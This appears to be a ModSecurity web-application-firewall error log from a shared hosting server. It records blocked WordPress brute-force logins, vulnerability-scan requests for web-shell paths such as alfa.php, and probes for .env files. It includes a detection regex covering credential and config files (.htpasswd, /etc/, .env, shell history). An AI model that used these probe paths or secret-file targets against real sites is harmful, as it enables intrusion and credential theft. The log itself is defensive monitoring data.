[Tue May 26 19:36:01.855816 2026] [security2:error] [pid 58470:tid 58624] [client 45.131.193.31:46507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "operatives.org.in"] [uri "/wp-login.php"] [unique_id "ahWoybnjVHRH3AGGvmYenQAAABg"]
[Tue May 26 19:36:02.237240 2026] [security2:error] [pid 58470:tid 58540] [remote 44.242.10.134:48846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoyrnjVHRH3AGGvmYesAAATkU"]
[Tue May 26 19:36:02.649216 2026] [security2:error] [pid 58470:tid 58621] [client 176.65.139.231:29116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.glorodrc.com"] [uri "/.env"] [unique_id "ahWoyrnjVHRH3AGGvmYevgAAABU"]
[Tue May 26 19:36:03.496932 2026] [security2:error] [pid 58470:tid 58721] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoy7njVHRH3AGGvmYe0QAAAHk"]
[Tue May 26 19:36:04.393209 2026] [security2:error] [pid 58470:tid 58618] [client 176.65.139.239:30948] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "zeexo.glorodrc.com"] [uri "/.env"] [unique_id "ahWozLnjVHRH3AGGvmYfAAAAABI"]
[Tue May 26 19:36:05.089501 2026] [security2:error] [pid 58470:tid 58651] [client 212.115.49.194:38085] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "212.115.49.194" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWozLnjVHRH3AGGvmYfCgAAADM"], referer: https://anujtradingco.com
[Tue May 26 19:36:05.364134 2026] [security2:error] [pid 58470:tid 58657] [client 114.119.135.84:47173] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-full-width-images/page/2"] [unique_id "ahWozbnjVHRH3AGGvmYfGwAAADk"], referer: http://www.anujtradingco.com/blog-2/blog-full-width-images/page/2?id=index-1746509880&ucat=128
[Tue May 26 19:36:05.379126 2026] [security2:error] [pid 58470:tid 58529] [remote 5.42.158.148:52218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWozbnjVHRH3AGGvmYfFwAAcTo"]
[Tue May 26 19:36:05.946310 2026] [security2:error] [pid 58470:tid 58547] [remote 141.138.139.98:42410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWozbnjVHRH3AGGvmYfKAAAO0w"]
[Tue May 26 19:36:06.237733 2026] [security2:error] [pid 58470:tid 58602] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWozbnjVHRH3AGGvmYfLgAAAAI"]
[Tue May 26 19:36:07.503372 2026] [security2:error] [pid 58470:tid 58696] [client 199.47.82.19:0] ModSecurity: Warning. Matched phrase "Turnitin" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWoz7njVHRH3AGGvmYfZAAAAGA"]
[Tue May 26 19:36:07.503407 2026] [security2:error] [pid 58470:tid 58696] [client 199.47.82.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWoz7njVHRH3AGGvmYfZAAAAGA"]
[Tue May 26 19:36:07.505058 2026] [security2:error] [pid 58470:tid 58669] [client 199.47.82.19:52932] ModSecurity: Warning. Matched phrase "Turnitin" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWoz7njVHRH3AGGvmYfYgAAAEU"]
[Tue May 26 19:36:07.566222 2026] [security2:error] [pid 58470:tid 58531] [remote 141.138.139.98:42410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWoz7njVHRH3AGGvmYfagAAazw"], referer: https://christinaspromotions.com/wp-login.php
[Tue May 26 19:36:07.633947 2026] [security2:error] [pid 58470:tid 58650] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoz7njVHRH3AGGvmYfWgAAADI"]
[Tue May 26 19:36:07.867602 2026] [security2:error] [pid 58470:tid 58623] [client 199.47.82.19:0] ModSecurity: Warning. Matched phrase "Turnitin" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWoz7njVHRH3AGGvmYfcgAAABc"]
[Tue May 26 19:36:07.868239 2026] [security2:error] [pid 58470:tid 58618] [client 199.47.82.19:52936] ModSecurity: Warning. Matched phrase "Turnitin" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWoz7njVHRH3AGGvmYfcAAAABI"]
[Tue May 26 19:36:08.520665 2026] [security2:error] [pid 58470:tid 58554] [remote 45.130.18.144:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.18.130.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWo0LnjVHRH3AGGvmYfhgAAAVM"]
[Tue May 26 19:36:08.559548 2026] [security2:error] [pid 58470:tid 58693] [client 46.8.22.29:45587] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWo0LnjVHRH3AGGvmYffwAAAF0"], referer: https://anujtradingco.com
[Tue May 26 19:36:09.837198 2026] [security2:error] [pid 58470:tid 58664] [client 77.83.39.42:41872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/.env"] [unique_id "ahWo0bnjVHRH3AGGvmYftAAAAEA"]
[Tue May 26 19:36:09.932012 2026] [security2:error] [pid 58470:tid 58656] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo0bnjVHRH3AGGvmYfsAAAADg"]
[Tue May 26 19:36:10.372596 2026] [security2:error] [pid 58470:tid 58543] [remote 45.130.18.144:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.18.130.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWo0rnjVHRH3AGGvmYfwwAAaUg"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:36:11.932864 2026] [security2:error] [pid 58470:tid 58647] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo07njVHRH3AGGvmYf6AAAAC8"]
[Tue May 26 19:36:13.157068 2026] [security2:error] [pid 58470:tid 58546] [remote 216.73.216.30:18585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWo1bnjVHRH3AGGvmYgFwAAEks"]
[Tue May 26 19:36:13.274095 2026] [security2:error] [pid 58470:tid 58657] [client 195.2.84.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWo1bnjVHRH3AGGvmYgHAAAADk"], referer: https://www.anujtradingco.com/author/admin/
[Tue May 26 19:36:13.556753 2026] [fcgid:warn] [pid 58470:tid 58712] (70014)End of file found: [client 66.132.186.205:12872] mod_fcgid: can't get data from http client
[Tue May 26 19:36:14.148655 2026] [security2:error] [pid 58470:tid 58677] [client 195.2.84.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWo1rnjVHRH3AGGvmYgRAAAAE0"], referer: https://anujtradingco.com/author/admin/
[Tue May 26 19:36:14.628506 2026] [security2:error] [pid 58470:tid 58670] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo1rnjVHRH3AGGvmYgRwAAAEY"]
[Tue May 26 19:36:16.510614 2026] [security2:error] [pid 58470:tid 58579] [remote 44.242.10.134:22280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWo2LnjVHRH3AGGvmYglQAAAmw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:36:16.854276 2026] [security2:error] [pid 58470:tid 58727] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo2LnjVHRH3AGGvmYgjwAAAH8"]
[Tue May 26 19:36:17.949294 2026] [security2:error] [pid 58470:tid 58521] [remote 216.73.216.30:18585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWo2bnjVHRH3AGGvmYgxAAAbDI"]
[Tue May 26 19:36:18.104255 2026] [security2:error] [pid 58470:tid 58705] [client 73.84.198.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo2bnjVHRH3AGGvmYgugAAAGk"]
[Tue May 26 19:36:18.356971 2026] [security2:error] [pid 58470:tid 58659] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo2bnjVHRH3AGGvmYgwwAAADs"]
[Tue May 26 19:36:19.127548 2026] [security2:error] [pid 58470:tid 58612] [client 172.202.92.73:53190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWo27njVHRH3AGGvmYg6wAAAAw"]
[Tue May 26 19:36:19.127701 2026] [security2:error] [pid 58470:tid 58612] [client 172.202.92.73:53190] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWo27njVHRH3AGGvmYg6wAAAAw"]
[Tue May 26 19:36:21.024336 2026] [security2:error] [pid 58470:tid 58640] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo3LnjVHRH3AGGvmYhOAAAACg"]
[Tue May 26 19:36:23.184101 2026] [security2:error] [pid 58470:tid 58697] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo3rnjVHRH3AGGvmYhiwAAAGE"]
[Tue May 26 19:36:23.193525 2026] [security2:error] [pid 58470:tid 58501] [remote 216.73.216.30:58306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWo37njVHRH3AGGvmYhlgAAfh4"]
[Tue May 26 19:36:25.244703 2026] [security2:error] [pid 58470:tid 58668] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo4LnjVHRH3AGGvmYhuwAAAEQ"]
[Tue May 26 19:36:25.848386 2026] [security2:error] [pid 58470:tid 58621] [client 172.202.92.73:55806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/admin.php"] [unique_id "ahWo4bnjVHRH3AGGvmYh1wAAABU"]
[Tue May 26 19:36:25.848485 2026] [security2:error] [pid 58470:tid 58621] [client 172.202.92.73:55806] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/admin.php"] [unique_id "ahWo4bnjVHRH3AGGvmYh1wAAABU"]
[Tue May 26 19:36:26.634640 2026] [security2:error] [pid 58470:tid 58698] [client 31.57.184.107:52717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "healthcarecoinbase.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWo4rnjVHRH3AGGvmYh5QAAAGI"], referer: https://www.bing.com/
[Tue May 26 19:36:27.235068 2026] [security2:error] [pid 58470:tid 58727] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo4rnjVHRH3AGGvmYh9QAAAH8"]
[Tue May 26 19:36:28.887516 2026] [security2:error] [pid 58470:tid 58635] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo5LnjVHRH3AGGvmYiGgAAACM"]
[Tue May 26 19:36:30.188054 2026] [security2:error] [pid 58470:tid 58724] [client 172.202.92.73:53215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/goods.php"] [unique_id "ahWo5rnjVHRH3AGGvmYiYwAAAHw"]
[Tue May 26 19:36:30.188159 2026] [security2:error] [pid 58470:tid 58724] [client 172.202.92.73:53215] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/goods.php"] [unique_id "ahWo5rnjVHRH3AGGvmYiYwAAAHw"]
[Tue May 26 19:36:30.273027 2026] [security2:error] [pid 58470:tid 58709] [client 64.233.173.133:58145] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWo5LnjVHRH3AGGvmYiHgAAAG0"]
[Tue May 26 19:36:31.160544 2026] [security2:error] [pid 58470:tid 58528] [remote 113.190.40.93:58840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWo5rnjVHRH3AGGvmYiewAAYzk"]
[Tue May 26 19:36:31.523478 2026] [security2:error] [pid 58470:tid 58600] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo57njVHRH3AGGvmYifwAAAAA"]
[Tue May 26 19:36:32.927453 2026] [security2:error] [pid 58470:tid 58681] [client 172.202.92.73:55791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/public/css.php"] [unique_id "ahWo6LnjVHRH3AGGvmYisgAAAFE"]
[Tue May 26 19:36:32.927573 2026] [security2:error] [pid 58470:tid 58681] [client 172.202.92.73:55791] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/public/css.php"] [unique_id "ahWo6LnjVHRH3AGGvmYisgAAAFE"]
[Tue May 26 19:36:33.841761 2026] [security2:error] [pid 58470:tid 58665] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo6bnjVHRH3AGGvmYiygAAAEE"]
[Tue May 26 19:36:34.473353 2026] [security2:error] [pid 58470:tid 58666] [client 45.131.193.22:57425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "juniorwoodies.com"] [uri "/wp-login.php"] [unique_id "ahWo6rnjVHRH3AGGvmYi3gAAAEI"]
[Tue May 26 19:36:34.863431 2026] [security2:error] [pid 58470:tid 58605] [client 47.201.73.91:59422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.73.201.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWo6rnjVHRH3AGGvmYi6wAAAAU"]
[Tue May 26 19:36:34.863589 2026] [security2:error] [pid 58470:tid 58605] [client 47.201.73.91:59422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWo6rnjVHRH3AGGvmYi6wAAAAU"]
[Tue May 26 19:36:35.437465 2026] [security2:error] [pid 58470:tid 58693] [client 172.202.92.73:55747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/alfa.php"] [unique_id "ahWo67njVHRH3AGGvmYi_gAAAF0"]
[Tue May 26 19:36:35.437574 2026] [security2:error] [pid 58470:tid 58693] [client 172.202.92.73:55747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/alfa.php"] [unique_id "ahWo67njVHRH3AGGvmYi_gAAAF0"]
[Tue May 26 19:36:35.650670 2026] [security2:error] [pid 58470:tid 58541] [remote 54.36.102.244:41338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWo67njVHRH3AGGvmYi_wAAKEY"]
[Tue May 26 19:36:35.771138 2026] [security2:error] [pid 58470:tid 58724] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo67njVHRH3AGGvmYi-gAAAHw"]
[Tue May 26 19:36:35.891794 2026] [security2:error] [pid 58470:tid 58589] [remote 54.36.102.244:41338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWo67njVHRH3AGGvmYjNwAAD3Y"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:36:37.023816 2026] [security2:error] [pid 58470:tid 58696] [client 77.83.39.42:60394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahWo7bnjVHRH3AGGvmYjWQAAAGA"]
